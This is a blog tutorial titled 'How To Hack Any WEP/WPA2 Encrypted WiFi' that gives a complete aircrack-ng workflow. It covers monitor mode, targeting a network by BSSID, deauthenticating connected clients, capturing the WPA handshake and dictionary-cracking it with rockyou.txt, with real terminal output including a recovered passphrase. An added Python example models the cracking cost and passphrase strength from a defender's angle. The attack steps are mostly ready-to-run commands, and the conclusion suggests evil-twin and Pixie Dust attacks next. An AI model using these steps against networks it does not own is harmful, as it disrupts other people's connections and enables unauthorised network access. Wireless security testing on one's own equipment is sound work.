Sploitech

How To Hack Any WEP/WPA2 Encrypted WiFi Using Aircrack-ng

WiFi Hacking Using Aircrack-ng

About The Tool

Aircrack-ng is a complete suite of tools to assess WiFi network security.

It focuses on different areas of WiFi security:

  • Monitoring: Packet capture and export of data to text files for further processing by third-party tools.
  • Attacking: Replay attacks, deauthentication, fake access points, and others via packet injection.
  • Testing: Checking WiFi cards and driver capabilities (capture and injection).
  • Cracking: WEP and WPA PSK (WPA 1 and 2).

All tools are command-line programs, which allows for heavy scripting, and a lot of GUIs have taken advantage of this. It works primarily on Linux, but also on Windows, macOS, FreeBSD, OpenBSD, NetBSD, Solaris and even eComStation 2.

Tools & Software Required:

  • One system capable of running Kali Linux. (I am using a Raspberry Pi 400.)
  • One router of your own to be hacked. (You can also use a mobile hotspot.)
  • One WiFi adapter compatible with Linux that supports monitor mode and packet injection.
  • Aircrack-ng software. (It is installed by default on Kali.)

Note: you can also perform the hack from a virtual machine, but it still requires a physical WiFi adapter.

(I recommend the Raspberry Pi 400 or Raspberry Pi 3 because they come with WiFi built in.)

Recommended WiFi Cards:

  • Note: both the Archer T2U Plus and the TL-WN722N v2/v3 do not work properly with Linux out of the box; they require additional drivers, which are available on GitHub.

Driver installation guide & links: all of these links have been tested with both of the WiFi adapters.

Killing All Background Processes:

First, we need to kill all the processes that might interfere with the aircrack-ng suite. It is strongly recommended that these processes be eliminated prior to using the aircrack-ng suite. “check kill” will check and kill off processes that might interfere with the aircrack-ng suite.

  • Type: sudo airmon-ng check kill

    ┌──(kali㉿kali)-[~]
    └─$ sudo airmon-ng check kill

    Killing these processes:

        PID Name
        684 wpa_supplicant

Starting WiFi In Monitor Mode:

By default the WiFi card is in managed mode, so we have to enable monitor mode on the card we are using for attacking.

Note: It is very important to kill the network managers before putting a card in monitor mode.

  • Type: sudo airmon-ng start wlan0

    ┌──(kali㉿kali)-[~]
    └─$ sudo airmon-ng start wlan0

    PHY     Interface       Driver          Chipset

    phy1    wlan0           8188eu          TP-Link TL-WN722N v2/v3 [Realtek RTL8188EUS]
                    (monitor mode enabled)

Scanning For Nearby WiFi Networks:

Now we have to monitor all nearby wireless networks, hopping between all wireless channels. For that:

  • Type: sudo airodump-ng wlan0

     CH  1 ][ Elapsed: 18 s ][ 2021-08-20 12:50

     BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

     24:0B:88:AE:18:29  -40       73       58    2   2  130   WPA2 CCMP   PSK  Airtel
     5A:95:D8:16:3A:B2  -61       87        0    0   6  130   WPA2 CCMP   PSK  <length:  0>
     58:95:D8:26:3A:B2  -58       93        0    0   6  130   WPA2 CCMP   PSK  Bhandari-2G
     C0:8F:20:28:0C:32  -93        5        0    0  11  130   WPA2 CCMP   PSK  Laxman
     A8:DA:0C:02:E7:A6  -86       22        0    0   6  130   WPA2 CCMP   PSK  psaaa#82
     AA:DA:0C:12:E7:A6  -86       27        0    0   6  130   WPA2 CCMP   PSK  <length:  0>

     BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

     24:0B:88:AE:18:29  E0:CC:F8:40:8B:E6  -80    1e- 1e     0       81
     24:0B:88:AE:18:29  E0:13:B5:73:59:E3  -38    1e- 1     27      131
    Quitting...

Once you have found your network, press Ctrl+C to exit.

  • CH: The channel on which the wireless network sends and receives data.
  • BSSID: The MAC address of the access point's radio interface, i.e. the one the client devices are connected to.
  • ENC: The encryption or security scheme the network is using.
  • ESSID: Extended Service Set Identifier, i.e. the human-readable name of the wireless network.

Capturing WPA Handshake:

I am attacking Airtel (it is my own network). Now we have to copy the BSSID of the network we are attacking and lock airodump-ng onto it:

    sudo airodump-ng -c 2 --bssid 24:0B:88:AE:18:29 -w /home/kali/ wlan0

  • --bssid: MAC address of the wireless access point (WAP).
  • -c: Channel number.
  • -w: Output file prefix (here the /home/kali/ directory) for the capture file that will hold the handshake (the "password file").
  • wlan0: Name of the interface.

     CH  2 ][ Elapsed: 27 mins ][ 2021-08-21 11:49

     BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

     24:0B:88:AE:18:29  -42 100    15237   567903   14   2  130   WPA2 CCMP   PSK  Airtel

     BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

     24:0B:88:AE:18:29  E0:13:B5:73:59:E3  -42    1e- 1   1237   130458
     24:0B:88:AE:18:29  E0:CC:F8:40:8B:E6  -84   24e- 1e     2    42157
     24:0B:88:AE:18:29  1C:BF:C0:B5:78:57  -94    1e- 1     15   448988

Now open a new terminal window to disconnect the clients connected to the target network. (Do not close the current window!)

Kicking Clients Off The Network:

Once a client is disconnected from the network it will try to reconnect; while the deauthentication frames keep arriving it cannot stay connected, and when it re-authenticates we capture the handshake (the "password file") that it sends to the WiFi.

So we have to disconnect all the clients from the network to capture the password file:

    sudo aireplay-ng -0 20 -a 24:0B:88:AE:18:29 wlan0

  • aireplay-ng: The tool used to inject frames.
  • -0: Deauthentication attack.
  • 20: Number of deauthentication packets to send (0 means send continuously).
  • -a: The BSSID of the target network.

    ┌──(kali㉿kali)-[~]
    └─$ sudo aireplay-ng -0 20 -a 24:0B:88:AE:18:29 wlan0
    12:34:10  Waiting for beacon frame (BSSID: 24:0B:88:AE:18:29) on channel 2
    NB: this attack is more effective when targeting
    a connected wireless client (-c client's mac).
    12:34:10  Sending DeAuth (code 7) to broadcast -- BSSID: [24:0B:88:AE:18:29]
    12:34:11  Sending DeAuth (code 7) to broadcast -- BSSID: [24:0B:88:AE:18:29]
    12:34:11  Sending DeAuth (code 7) to broadcast -- BSSID: [24:0B:88:AE:18:29]
    12:34:12  Sending DeAuth (code 7) to broadcast -- BSSID: [24:0B:88:AE:18:29]
    12:34:13  Sending DeAuth (code 7) to broadcast -- BSSID: [24:0B:88:AE:18:29]
    12:34:13  Sending DeAuth (code 7) to broadcast -- BSSID: [24:0B:88:AE:18:29]
    12:34:14  Sending DeAuth (code 7) to broadcast -- BSSID: [24:0B:88:AE:18:29]
    12:34:14  Sending DeAuth (code 7) to broadcast -- BSSID: [24:0B:88:AE:18:29]
    12:34:15  Sending DeAuth (code 7) to broadcast -- BSSID: [24:0B:88:AE:18:29]
    12:34:16  Sending DeAuth (code 7) to broadcast -- BSSID: [24:0B:88:AE:18:29]
    12:34:16  Sending DeAuth (code 7) to broadcast -- BSSID: [24:0B:88:AE:18:29]
    12:34:17  Sending DeAuth (code 7) to broadcast -- BSSID: [24:0B:88:AE:18:29]
    12:34:17  Sending DeAuth (code 7) to broadcast -- BSSID: [24:0B:88:AE:18:29]
    12:34:18  Sending DeAuth (code 7) to broadcast -- BSSID: [24:0B:88:AE:18:29]
    12:34:18  Sending DeAuth (code 7) to broadcast -- BSSID: [24:0B:88:AE:18:29]
    12:34:19  Sending DeAuth (code 7) to broadcast -- BSSID: [24:0B:88:AE:18:29]
    12:34:20  Sending DeAuth (code 7) to broadcast -- BSSID: [24:0B:88:AE:18:29]
    12:34:20  Sending DeAuth (code 7) to broadcast -- BSSID: [24:0B:88:AE:18:29]
    12:34:21  Sending DeAuth (code 7) to broadcast -- BSSID: [24:0B:88:AE:18:29]
    12:34:21  Sending DeAuth (code 7) to broadcast -- BSSID: [24:0B:88:AE:18:29]

In the other terminal window we have successfully captured the WPA handshake (note the "WPA handshake:" marker in the top line and the EAPOL note on the station row); it is stored under /home/kali/:

     CH  2 ][ Elapsed: 4 mins ][ 2021-08-21 12:38 ][ WPA handshake: 24:0B:88:AE:18:29

     BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

     24:0B:88:AE:18:29  -44  92     2311      499    0   2  130   WPA2 CCMP   PSK  Airtel

     BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

     24:0B:88:AE:18:29  4A:05:F5:65:77:8F  -50    1e- 6e     0     1441  EAPOL  Airtel

Brute Force Using Aircrack-ng:

Now we have captured the WPA handshake and it is stored in the /home/kali/ directory. We have to brute force the handshake file with aircrack-ng, using the rockyou.txt wordlist. It comes with Kali Linux by default and just needs to be extracted.

  • Steps to extract rockyou.txt:

    # copy and paste this in the terminal
    cd /usr/share/wordlists
    sudo gunzip rockyou.txt.gz

After you have unzipped rockyou.txt you can start the brute force:

    sudo aircrack-ng -a2 -b 24:0B:88:AE:18:29 -w /usr/share/wordlists/rockyou.txt /home/kali/01.cap

  • -a: Attack mode; 2 selects WPA-PSK, which covers both WPA and WPA2 networks.
  • -b: The BSSID of the target network.
  • -w: Location of the wordlist file.
  • /home/kali/01.cap: Location of the capture (.cap) file.
				
					.                               Aircrack-ng 1.6 

      [00:00:00] 474/10303727 keys tested (154.55 k/s) 

      Time left: 18 hours, 31 minutes, 10 seconds                0.00%

                           KEY FOUND! [ air64776 ]


      Master Key     : 3E 9C 7D 22 61 C0 FD FF 64 0B 01 D9 50 75 12 7A 
                       30 D4 44 22 A4 B3 FF 9C 1C 09 8B BA 69 9B 87 9E 

      Transient Key  : E0 8B EF DA 05 BD 4F 8A 60 E1 83 81 38 C1 17 61 
                       48 38 18 A4 37 70 79 56 A9 85 A5 98 62 A2 19 63 
                       40 DD DD B0 30 BC F1 60 3C 0D 9F F2 79 E9 37 22 
                       D7 94 19 76 A3 70 15 E6 A1 46 C8 D9 13 15 1F 00 

      EAPOL HMAC     : 89 3E 8D 44 16 B6 C1 F4 49 FE 76 89 7F 33 46 B0 
				
			

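The cracking step above is a dictionary attack against PBKDF2: for every candidate passphrase aircrack-ng derives a PMK (the "Master Key" in its output) with 4096 rounds of HMAC-SHA1 salted with the ESSID and checks it against the captured handshake, which is why the Raspberry Pi only manages about 155 guesses per second. The following added Python example (not from the article or the aircrack-ng project) reproduces that derivation against the IEEE 802.11i known-answer vector, reproduces the article's "Time left" figure from its own numbers, and, from the defender's side, shows how fast the passphrase space outgrows an assumed GPU guess rate; that GPU rate is an assumption, the other figures are the article's.

```python
"""WPA2-PSK cost model behind the aircrack-ng run above.

Added example, not code from the article or the aircrack-ng project. The PMK derivation
is the IEEE 802.11i definition (PBKDF2-HMAC-SHA1, 4096 rounds, 256-bit key, ESSID as salt);
the GPU guess rate is a labelled assumption, the other numbers are taken from the article.
"""
import hashlib
import math

WPA_PBKDF2_ROUNDS = 4096  # fixed by the standard; this is what makes every guess expensive
IEEE_VECTOR = ("password", "IEEE",  # known-answer test from IEEE 802.11i Annex H
               "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e")
ARTICLE_RATE = 154.55           # keys/s reported by aircrack-ng on the Raspberry Pi 400
ROCKYOU_LINES = 10_303_727      # candidates in rockyou.txt as shown in the output
ASSUMED_GPU_RATE = 1_000_000.0  # assumption: order-of-magnitude rate of a GPU cracking rig


def derive_pmk(passphrase: str, essid: str) -> bytes:
    """PMK (aircrack-ng's 'Master Key') = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096, 32 bytes)."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrases are 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), WPA_PBKDF2_ROUNDS, 32)


def pmk_matches(passphrase: str, essid: str, master_key_hex: str) -> bool:
    """Compare a derived PMK with a 'Master Key' line as printed by aircrack-ng."""
    return derive_pmk(passphrase, essid).hex() == master_key_hex.replace(" ", "").lower()


def time_to_exhaust(candidates: int, tested: int, rate_per_s: float) -> tuple[int, int, int]:
    """Worst-case remaining time as (h, m, s): the 'Time left' figure aircrack-ng prints."""
    secs = math.floor((candidates - tested) / rate_per_s)
    return secs // 3600, (secs % 3600) // 60, secs % 60


def years_to_exhaust(alphabet_size: int, length: int, rate_per_s: float) -> float:
    """Years needed to try every passphrase of this alphabet and length at a given guess rate."""
    return alphabet_size ** length / rate_per_s / (365 * 86400)


if __name__ == "__main__":
    assert pmk_matches(IEEE_VECTOR[0], IEEE_VECTOR[1], IEEE_VECTOR[2])
    print("Time left (article, 474 of rockyou tested):", time_to_exhaust(ROCKYOU_LINES, 474, ARTICLE_RATE))
    # If the article's output is genuine, its 'Master Key' is PMK('air64776', 'Airtel') and this prints True.
    page_master_key = ("3E 9C 7D 22 61 C0 FD FF 64 0B 01 D9 50 75 12 7A "
                       "30 D4 44 22 A4 B3 FF 9C 1C 09 8B BA 69 9B 87 9E")
    print("Article Master Key is PMK of recovered passphrase:", pmk_matches("air64776", "Airtel", page_master_key))
    # Defender's view: 8 chars of [a-z0-9] fall in about a month at the assumed rate; 14 mixed chars never do.
    print("8 chars [a-z0-9] at GPU rate: %.1e years" % years_to_exhaust(36, 8, ASSUMED_GPU_RATE))
    print("14 chars [A-Za-z0-9] at GPU rate: %.1e years" % years_to_exhaust(62, 14, ASSUMED_GPU_RATE))
```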
Conclusion

These types of attacks take a long time to crack the password and they are not always successful; instead, you can also use an evil twin or Pixie Dust attack, which take less time and give better results.
